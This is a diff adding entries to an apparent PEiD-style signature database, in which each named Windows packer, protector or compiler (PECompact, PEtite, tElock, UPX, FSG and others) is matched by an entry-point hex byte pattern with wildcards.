+signature = EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81
+ep_only = true
+
+[PECompact v1.84]
+signature = 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81
+ep_only = true
+
+[PECompact v2.0 beta -> Jeremy Collake]
+signature = B8 ?? ?? ?? ?? 05 ?? ?? ?? ?? 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 CC 90 90 90 90
+ep_only = true
+
+[PE Diminisher v0.1]
+signature = 53 51 52 56 57 55 E8 00 00 00 00 5D 8B D5 81 ED A2 30 40 00 2B 95 91 33 40 00 81 EA 0B 00 00 00 89 95 9A 33 40 00 80 BD 99 33 40 00 00 74
+ep_only = true
+
+[PE Diminisher v0.1]
+signature = 5D 8B D5 81 ED A2 30 40 ?? 2B 95 91 33 40 ?? 81 EA 0B ?? ?? ?? 89 95 9A 33 40 ?? 80 BD 99
+ep_only = true
+
+[PEncrypt v1.0]
+signature = 60 9C BE 00 10 40 00 8B FE B9 28 03 00 00 BB 78 56 34 12 AD 33 C3 AB E2 FA 9D 61
+ep_only = true
+
+[PEncrypt v3.0]
+signature = E8 00 00 00 00 5D 81 ED 05 10 40 00 8D B5 24 10 40 00 8B FE B9 0F 00 00 00 BB ?? ?? ?? ?? AD 33 C3 E2 FA
+ep_only = true
+
+[PEncrypt v3.1]
+signature = E9 ?? ?? ?? 00 F0 0F C6
+ep_only = true
+
+[PEnguinCrypt v1.0]
+signature = B8 93 ?? ?? 00 55 50 67 64 FF 36 00 00 67 64 89 26 00 00 BD 4B 48 43 42 B8 04 00 00 00 CC 3C 04 75 04 90 90 C3 90 67 64 8F 06 00 00 58 5D BB 00 00 40 00 33 C9 33 C0
+ep_only = true
+
+[PENightMare v1.3]
+signature = 60 E8 00 00 00 00 5D B9 ?? ?? ?? ?? 80 31 15 41 81 F9
+ep_only = true
+
+[PENightMare 2 Beta]
+signature = 60 E9 ?? ?? ?? ?? EF 40 03 A7 07 8F 07 1C 37 5D 43 A7 04 B9 2C 3A
+ep_only = true
+
+[PENinja]
+signature = 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
+ep_only = true
+
+[PENinja modified]
+signature = 5D 8B C5 81 ED B2 2C 40 00 2B 85 94 3E 40 00 2D 71 02 00 00 89 85 98 3E 40 00 0F B6 B5 9C 3E 40 00 8B FD
+ep_only = true
+
+[PEMangle]
+signature = 60 9C BE ?? ?? ?? ?? 8B FE B9 ?? ?? ?? ?? BB 44 52 4F 4C AD 33 C3
+ep_only = true
+
+[PESHiELD v0.1b MTE]
+signature = E8 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B9 1B 01 ?? ?? D1
+ep_only = true
+
+[PESHiELD v0.2 / v0.2b / v0.2b2]
+signature = 60 E8 ?? ?? ?? ?? 41 4E 41 4B 49 4E 5D 83 ED 06 EB 02 EA 04
+ep_only = true
+
+[PESHiELD v0.25]
+signature = 60 E8 2B 00 00 00
+ep_only = true
+
+[PESHiELD v0.251]
+signature = 5D 83 ED 06 EB 02 EA 04 8D
+ep_only = true
+
+[PEShit]
+signature = B8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 83 F9 00 7E 06 80 30 ?? 40 E2 F5 E9 ?? ?? ?? FF
+ep_only = true
+
+[PE Spin v0.b]
+signature = EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 72 C8 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 26 E8 01 00 00 00 EA 5A 33 C9 8B 95 68 20 40 00 8B 42 3C 03 C2 89 85 76 20 40 00 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 9D 8A 20 40 00 8B 59 24 03 DA 8B 1B 89 9D 8E 20 40 00 53 8F 85 E2 1F 40 00 8D 85 92 20 40 00 6A 0C 5B 6A 17 59 30 0C 03 02 CB 4B 75 F8 40 8D 9D 41 8F 4E 00 50 53 81 2C 24 01 78 0E 00 FF B5 8A 20 40 00 C3 92 EB 15 68 BB ?? 00 00 00 B9 90 08 00 00 8D BD FF 20 40 00 4F 30 1C 39 FE CB E2 F9 68 1D 01 00 00 59 8D BD 2F 28 40 00 C0 0C 39 02 E2 FA 68 A0 20 40 00 50 01 6C 24 04 E8 BD 09 00 00 33 C0 0F 84 C0 08 00
+ep_only = true
+
+[PEtite v1.2]
+signature = 9C 60 E8 CA ?? ?? ?? 03 ?? 04 ?? 05 ?? 06 ?? 07 ?? 08
+ep_only = true
+
+[PEtite v1.3]
+signature =  ?? ?? ?? ?? ?? 66 9C 60 50 8D 88 ?? F0 ?? ?? 8D 90 04 16 ?? ?? 8B DC 8B E1 68 ?? ?? ?? ?? 53 50 80 04 24 08 50 80 04 24 42
+ep_only = true
+
+[PEtite v1.4]
+signature =  ?? ?? ?? ?? ?? 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC
+ep_only = true
+
+[PEtite v1.4]
+signature = 66 9C 60 50 8B D8 03 ?? 68 54 BC ?? ?? 6A ?? FF 50 14 8B CC
+ep_only = true
+
+[PEtite v2.0]
+signature = B8 ?? ?? ?? ?? 66 9C 60 50 8B D8 03 ?? 68 54 BC ?? ?? 6A ?? FF 50 18 8B CC 8D A0 54 BC ?? ?? 8B C3 8D 90 E0 15 ?? ?? 68
+ep_only = true
+
+[PEtite v2.1]
+signature = B8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 66 9C 60 50
+ep_only = true
+
+[PEtite v2.2]
+signature = B8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 FF 35 ?? ?? ?? ?? 64 89 25 ?? ?? ?? ?? 66 9C 60 50
+ep_only = true
+
+[PEtite vx.x]
+signature = B8 ?? ?? ?? ?? 66 9C 60 50
+ep_only = true
+
+[PEX v0.99]
+signature = E9 F5 ?? ?? ?? 0D 0A C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4
+ep_only = true
+
+[PEX v0.99]
+signature = 60 E8 01 ?? ?? ?? ?? 83 C4 04 E8 01 ?? ?? ?? ?? 5D 81
+ep_only = true
+
+[PKLITE32 v1.1]
+signature = 55 8B EC A1 ?? ?? ?? ?? 85 C0 74 09 B8 01 00 00 00 5D C2 0C 00 8B 45 0C 57 56 53 8B 5D 10
+ep_only = true
+
+[PKLITE32 v1.1]
+signature = 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 00 00 00 00 E8
+ep_only = true
+
+[PKLITE32 v1.1]
+signature =  ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 50 4B 4C 49 54 45 33 32 20 43 6F 70 79 72 69 67 68 74 20 31
+ep_only = true
+
+[PKLITE32 1.1 -> PKWARE Inc.]
+signature = 68 ?? ?? ?? 00 68 ?? ?? ?? 00 68 00 00 00 00 E8 ?? ?? ?? ?? E9
+ep_only = true
+
+[Private EXE v2.0a]
+signature = 53 E8 00 00 00 00 5B 8B C3 2D
+ep_only = true
+
+[Private EXE v2.0a]
+signature = EB ?? CD ?? ?? ?? ?? ?? CD ?? ?? ?? ?? ?? EB ?? EB ?? EB ?? EB ?? CD ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 50 C3
+ep_only = true
+
+[Program Protector XP v1.0]
+signature = E8 ?? ?? ?? ?? 58 83 D8 05 89 C3 81 C3 ?? ?? ?? ?? 8B 43 64 50
+ep_only = true
+
+[Protection Plus vx.x]
+signature = 50 60 29 C0 64 FF 30 E8 ?? ?? ?? ?? 5D 83 ED 3C 89 E8 89 A5 14 ?? ?? ?? 2B 85 1C ?? ?? ?? 89 85 1C ?? ?? ?? 8D 85 27 03 ?? ?? 50 8B ?? 85 C0 0F 85 C0 ?? ?? ?? 8D BD 5B 03 ?? ?? 8D B5 43 03 ?? ?? E8 DD ?? ?? ?? 89 85 1F 03 ?? ?? 6A 40 68 ?? 10 ?? ?? 8B 85 28 ?? ?? ?? 50 6A
+ep_only = true
+
+[RatPacker (Glue) stub]
+signature = 40 20 FF 00 00 00 00 00 00 00 ?? BE 00 60 40 00 8D BE 00 B0 FF FF
+ep_only = true
+
+[Shrinker v3.2]
+signature = 83 3D ?? ?? ?? ?? ?? 55 8B EC 56 57 75 65 68 00 01 ?? ?? E8 ?? E6 FF FF 83 C4 04 8B 75 08 A3 ?? ?? ?? ?? 85 F6 74 1D 68 FF
+ep_only = true
+
+[Shrinker v3.3]
+signature = 83 3D ?? ?? ?? 00 00 55 8B EC 56 57 75 65 68 00 01 00 00 E8
+ep_only = true
+
+[Shrinker v3.4]
+signature = 83 3D B4 ?? ?? ?? ?? 55 8B EC 56 57 75 6B 68 00 01 00 00 E8 ?? 0B 00 00 83 C4 04 8B 75 08 A3 B4 ?? ?? ?? 85 F6 74 23 83 7D 0C 03 77 1D 68 FF
+ep_only = true
+
+[Shrink Wrap v1.4]
+signature = 58 60 8B E8 55 33 F6 68 48 01 ?? ?? E8 49 01 ?? ?? EB
+ep_only = true
+
+[SecuPack v1.5]
+signature = 55 8B EC 83 C4 F0 53 56 57 33 C0 89 45 F0 B8 CC 3A 40 ?? E8 E0 FC FF FF 33 C0 55 68 EA 3C 40 ?? 64 FF 30 64 89 20 6A ?? 68 80 ?? ?? ?? 6A 03 6A ?? 6A 01 ?? ?? ?? 80
+ep_only = true
+
+[SmokesCrypt v1.2]
+signature = 60 B8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8A 14 08 80 F2 ?? 88 14 08 41 83 F9 ?? 75 F1
+ep_only = true
+
+[Soft Defender v1.0 - v1.1]
+signature = 74 07 75 05 19 32 67 E8 E8 74 1F 75 1D E8 68 39 44 CD ?? 59 9C 50 74 0A 75 08 E8 59 C2 04 ?? 55 8B EC E8 F4 FF FF FF 56 57 53 78 0F 79 0D E8 34 99 47 49 34 33 EF 31 34 52 47 23 68 A2 AF 47 01 59 E8 ?? ?? ?? ?? 58 05 BA 01 ?? ?? 03 C8 74 BE 75 BC E8
+ep_only = true
+
+[Soft Defender v1.1x -> Randy Li]
+signature = 74 07 75 05 ?? ?? ?? ?? ?? 74 1F 75 1D ?? 68 ?? ?? ?? 00 59 9C 50 74 0A 75 08 ?? 59 C2 04 00 ?? ?? ?? E8 F4 FF FF FF ?? ?? ?? 78 0F 79 0D
+ep_only = true
+
+[SoftSentry v2.11]
+signature = 55 8B EC 83 EC ?? 53 56 57 E9 50
+ep_only = true
+
+[SoftSentry v3.0]
+signature = 55 8B EC 83 EC ?? 53 56 57 E9 B0 06
+ep_only = true
+
+[SoftWrap]
+signature = 52 53 51 56 57 55 E8 ?? ?? ?? ?? 5D 81 ED 36 ?? ?? ?? E8 ?? 01 ?? ?? 60 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F
+ep_only = true
+
+[Spalsher v1.0 - v3.0]
+signature = 9C 60 8B 44 24 24 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? 50 E8 ED 02 ?? ?? 8C C0 0F 84
+ep_only = true
+
+[Special EXE Password Protector v1.0]
+signature = 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 89 AD 8C 01 00 00 8B C5 2B 85 FE 75 00 00 89 85 3E 77
+ep_only = true
+
+[SPEC b2]
+signature = 55 57 51 53 E8 ?? ?? ?? ?? 5D 8B C5 81 ED ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 83 E8 09 89 85 ?? ?? ?? ?? 0F B6
+ep_only = true
+
+[SPEC b3]
+signature = 5B 53 50 45 43 5D E8 ?? ?? ?? ?? 5D 8B C5 81 ED 41 24 40 ?? 2B 85 89 26 40 ?? 83 E8 0B 89 85 8D 26 40 ?? 0F B6 B5 91 26 40 ?? 8B FD
+ep_only = true
+
+[Stealth PE v1.1]
+signature = BA ?? ?? ?? 00 FF E2 BA ?? ?? ?? 00 B8 ?? ?? ?? ?? 89 02 83 C2 03 B8 ?? ?? ?? ?? 89 02 83 C2 FD FF E2
+ep_only = true
+
+[Stone's PE Encryptor v1.0]
+signature = 55 57 56 52 51 53 E8 ?? ?? ?? ?? 5D 8B D5 81 ED 63 3A 40 ?? 2B 95 C2 3A 40 ?? 83 EA 0B 89 95 CB 3A 40 ?? 8D B5 CA 3A 40 ?? 0F B6 36
+ep_only = true
+
+[Stone's PE Encryptor v1.13]
+signature = 55 57 56 52 51 53 E8 ?? ?? ?? ?? 5D 8B D5 81 ED 97 3B 40 ?? 2B 95 2D 3C 40 ?? 83 EA 0B 89 95 36 3C 40 ?? 01 95 24 3C 40 ?? 01 95 28
+ep_only = true
+
+[Stone's PE Encryptor v2.0]
+signature = 53 51 52 56 57 55 E8 ?? ?? ?? ?? 5D 81 ED 42 30 40 ?? FF 95 32 35 40 ?? B8 37 30 40 ?? 03 C5 2B 85 1B 34 40 ?? 89 85 27 34 40 ?? 83
+ep_only = true
+
+[SVK-Protector v1.11]
+signature = 60 E8 ?? ?? ?? ?? 5D 81 ED 06 ?? ?? ?? 64 A0 23
+ep_only = true
+
+[SVK-Protector v1.051]
+signature = 60 EB 03 C7 84 E8 EB 03 C7 84 9A E8 00 00 00 00 5D 81 ED 10 00 00 00 EB 03 C7 84 E9 64 A0 23 00 00 00 EB
+ep_only = true
+
+[SVK-Protector v1.32]
+signature = 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 EB 05 B8 06 36 42 00 64 A0 23
+ep_only = true
+
+[Symantec Visual Cafe v3.0]
+signature = 64 8B 05 ?? ?? ?? ?? 55 8B EC 6A FF 68 ?? ?? 40 ?? 68 ?? ?? 40 ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 08 50 53 56 57 89 65 E8 C7 45 FC
+ep_only = true
+
+[SOFTWrapper for Win9x/NT (Evaluation Version)]
+signature = E8 00 00 00 00 5D 8B C5 2D ?? ?? ?? 00 50 81 ED 05 00 00 00 8B C5 2B 85 03 0F 00 00 89 85 03 0F 00 00 8B F0 03 B5 0B 0F 00 00 8B F8 03 BD 07 0F 00 00 83 7F 0C 00 74 2B 56 57 8B 7F 10 03 F8 8B 76 10 03 F0 83 3F 00 74 0C 8B 1E 89 1F 83 C6 04 83 C7 04 EB EF 5F 5E 83 C6 14 83 C7 14 EB D3 00 00 00 00 8B F5 81 C6 0D 0A 00 00 B9 0C 00 00 00 8B 85 03 0F 00 00 01 46 02 83 C6 06 E2 F8 E8 06 08 00 00 68 00 01 00 00 8D 85 DD 0D 00 00 50 6A 00 E8 95 09 00 00 8B B5 03 0F 00 00 66 81 3E 4D 5A 75 33 03 76 3C 81 3E 50 45 00 00 75 28 8B 46 28 03 85 03 0F 00 00 3B C5 74 1B 6A 30 E8 99 09 00 00 6A 30 8D 85 DD 0D 00 00 50 8D 85 2B 0F 00 00 E9 55 03 00 00 66 8B 85 9D 0A 00 00 F6 C4 80 74 31 E8 6A 07 00 00 0B C0 75 23 6A 40 E8 69 09 00 00 6A 40 8D 85 DD 0D 00 00 50 8B 9D 17 0F
+ep_only = true
+
+[TASM / MASM]
+signature = 6A 00 E8 ?? ?? 00 00 A3 ?? ?? 40 00
+ep_only = true
+
+[tElock v1.00]
+signature = E9 E5 E2 FF FF
+ep_only = true
+
+[tElock v0.41x]
+signature = 66 8B C0 8D 24 24 EB 01 EB 60 EB 01 EB 9C E8 00 00 00 00 5E 83 C6 50 8B FE 68 78 01 ?? ?? 59 EB 01 EB AC 54 E8 03 ?? ?? ?? 5C EB 08
+ep_only = true
+
+[tElock v0.42]
+signature = C1 EE 00 66 8B C9 EB 01 EB 60 EB 01 EB 9C E8 00 00 00 00 5E 83 C6 52 8B FE 68 79 01 59 EB 01 EB AC 54 E8 03 5C EB 08
+ep_only = true
+
+[tElock v0.51]
+signature = C1 EE 00 66 8B C9 EB 01 EB 60 EB 01 EB 9C E8 00 00 00 00 5E 83 C6 5E 8B FE 68 79 01 59 EB 01 EB AC 54 E8 03 5C EB 08
+ep_only = true
+
+[tElock v0.4x - v0.5x]
+signature = C1 EE 00 66 8B C9 EB 01 EB 60 EB 01 EB 9C E8 00 00 00 00 5E 83 C6 ?? 8B FE 68 79 01 ?? ?? 59 EB 01
+ep_only = true
+
+[tElock v0.60]
+signature = E9 00 00 00 00 60 E8 00 00 00 00 58 83 C0 08
+ep_only = true
+
+[tElock v0.70]
+signature = 60 E8 BD 10 00 00 C3 83 E2 00 F9 75 FA 70
+ep_only = true
+
+[tElock v0.71]
+signature = 60 E8 ED 10 00 00 C3 83
+ep_only = true
+
+[tElock v0.71b2]
+signature = 60 E8 44 11 00 00 C3 83
+ep_only = true
+
+[tElock v0.71b7]
+signature = 60 E8 48 11 00 00 C3 83
+ep_only = true
+
+[tElock v0.80]
+signature = 60 E8 F9 11 00 00 C3 83
+ep_only = true
+
+[tElock v0.7x - v0.84]
+signature = 60 E8 00 00 C3 83
+ep_only = true
+
+[tElock v0.85f]
+signature = 60 E8 02 00 00 00 CD 20 E8 00 00 00 00 5E 2B C9 58 74 02
+ep_only = true
+
+[tElock v0.90]
+signature =  ?? ?? E8 02 00 00 00 E8 00 E8 00 00 00 00 5E 2B
+ep_only = true
+
+[tElock v0.92a]
+signature = E9 7E E9 FF FF 00
+ep_only = true
+
+[tElock v0.95]
+signature = E9 D5 E4 FF FF 00
+ep_only = true
+
+[tElock v0.96]
+signature = E9 59 E4 FF FF 00
+ep_only = true
+
+[tElock v0.98]
+signature = E9 25 E4 FF FF 00 00 00 ?? ?? ?? ?? 1E
+ep_only = true
+
+[tElock v0.98b1]
+signature = E9 25 E4 FF FF
+ep_only = true
+
+[tElock v0.98b2]
+signature = E9 1B E4 FF FF
+ep_only = true
+
+[tElock v0.99]
+signature = E9 ?? ?? FF FF 00 00 00 ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? 02 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 00 00 00 00 ?? ?? 02 00 00 00 00 00 ?? ?? 02 00 00 00 00 00 ?? ?? 02 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 ?? 00 00 00 00 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? 02 00 ?? ?? 02 00 ?? ?? 02 00 ?? ?? 02 00 77 ?? 02 00 ?? ?? 02 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? 00 00 00 00 00 00 ?? ?? ?? 00 00 ?? ?? 00 00 00 ?? 00 00 ?? ?? 00 ?? ?? 00 00 ?? ?? ?? 00 00 00 00 00 00
+ep_only = true
+
+[tElock 1.0 (private) -> tE!]
+signature = E9 ?? ?? FF FF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 6B 65 72 6E 65 6C 33 32
+ep_only = true
+
+[The Guard Library]
+signature = 50 E8 ?? ?? ?? ?? 58 25 ?? F0 FF FF 8B C8 83 C1 60 51 83 C0 40 83 EA 06 52 FF 20 9D C3
+ep_only = true
+
+[Thinstall vx.x]
+signature = B8 EF BE AD DE 50 6A ?? FF 15 10 19 40 ?? E9 AD FF FF FF
+ep_only = true
+
+[UG2002 Cruncher v0.3b3]
+signature = 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? E8 0D ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 58
+ep_only = true
+
+[UPX v0.51]
+signature = 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 8D B0 D8 01 ?? ?? 83 CD FF 31 DB ?? ?? ?? ?? 01 DB 75 07 8B 1E 83 EE FC 11 DB 73 0B 8A 06 46 88 07 47 EB EB 90
+ep_only = true
+
+[UPX v0.60 - v0.61]
+signature = 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 8D B0 E8
+ep_only = true
+
+[UPX v0.62]
+signature = 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 F0 01 ?? ?? 83 CD FF 31 DB 90 90 90 EB 08 90 90 8A 06 46 88 07 47 01 DB 75 07
+ep_only = true
+
+[UPX v0.70]
+signature = 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 EC 01 ?? ?? 83 CD FF 31 DB EB 07 90 8A 06 46 88 07 47 01 DB 75 07
+ep_only = true
+
+[UPX v0.71 - v0.72]
+signature = 60 E8 00 00 00 00 83 CD FF 31 DB 5E 8D BE FA ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 81 C6 B3 01 ?? ?? EB 0A ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07
+ep_only = true
+
+[UPX v0.89.6 - v1.02 / v1.05 - v1.22 DLL]
+signature = 80 7C 24 08 01 0F 85 ?? ?? ?? 00 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF
+ep_only = true
+
+[UPX v0.80 - v0.84]
+signature =  ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 ?? ?? ?? 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF 75 09 8B 1E 83 EE FC
+ep_only = true
+
+[UPX v0.89.6 - v1.02 / v1.05 - v1.22]
+signature =  ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 ?? ?? ?? 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE FC
+ep_only = true
+
+[UPX Custom]
+signature = 90 90 90 90 90 90 8A 06 46 88 07 47 01 db
+ep_only = true
+
+[FSG v1.33 (Eng) -> dulek/xt]
+signature = BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF
+ep_only = true
+
+[Crypto-Lock v2.02 (Eng) -> Ryan Thian]
+signature = 60 BE 15 90 40 00 8D BE EB 7F FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47
+ep_only = true
+
+[PassLock 2000 v1.0 (Eng) -> Moonlight-Software]
+signature = 55 8B EC 53 56 57 BB 00 50 40 00 66 2E F7 05 34 20 40 00 04 00 0F 85 98 00 00 00 E8 1F 01
+ep_only = true
+
+[PESpin v0.3 (Eng) -> cyberbob]
+signature = EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46
+ep_only = true
+
+[Special EXE Pasword Protector v1.01 (Eng) -> Pavol Cerven]
+signature = 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 89 AD 8C 01 00 00 8B C5 2B 85 FE 75 00 00 89 85 3E
+ep_only = true
+
+[Crypto-Lock v2.02 (Eng) -> Ryan Thian]
+signature = 60 BE 15 90 40 00 8D BE EB 7F FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 03 72 0D C1 E0 08 8A 06 46 83 F0 FF 74 74 89 C5 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 75 20 41 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 83 C1 02 81 FD 00 F3 FF FF 83 D1 01 8D 14 2F 83 FD FC 76 0F 8A 02 42 88 07 47 49 75 F7 E9 63 FF FF FF 90 8B 02 83 C2 04 89 07 83 C7 04 83 E9 04 77 F1 01 CF E9 4C FF FF FF 5E 89 F7 B9 55 00 00 00 8A 07 47 2C E8 3C 01 77 F7 80 3F 01 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07
+ep_only = true
+
+[Crypto-Lock v2.02 (Eng) -> Ryan Thian]
+signature = 60 BE ?? 90 40 00 8D BE ?? ?? FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 03 72 0D C1 E0 08 8A 06 46 83 F0 FF 74 74 89 C5 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 75 20 41 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 83 C1 02 81 FD 00 F3 FF FF 83 D1 01 8D 14 2F 83 FD FC 76 0F 8A 02 42 88 07 47 49 75 F7 E9 63 FF FF FF 90 8B 02 83 C2 04 89 07 83 C7 04 83 E9 04 77 F1 01 CF E9 4C FF FF FF 5E 89 F7 B9 55 00 00 00 8A 07 47 2C E8 3C 01 77 F7 80 3F 01 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07
+ep_only = true
+
+[Exact Audio Copy -> (UnknownCompiler)]
+signature = E8 ?? ?? ?? 00 31 ED 55 89 E5 81 EC ?? 00 00 00 8D BD ?? FF FF FF B9 ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[FSG v1.00 (Eng) -> dulek/xt]
+signature = BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 51 FF FF FF 5F BB 28 ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE 0F 75 06 47 FF 37 AF EB 09 FE 0F 0F 84 ?? ?? ?? FF 57 55 FF 53 04 09 06 AD 75 DB 8B EC C3 1C ?? ?? 00 00 00 00 00 00 00 00
+ep_only = true
+
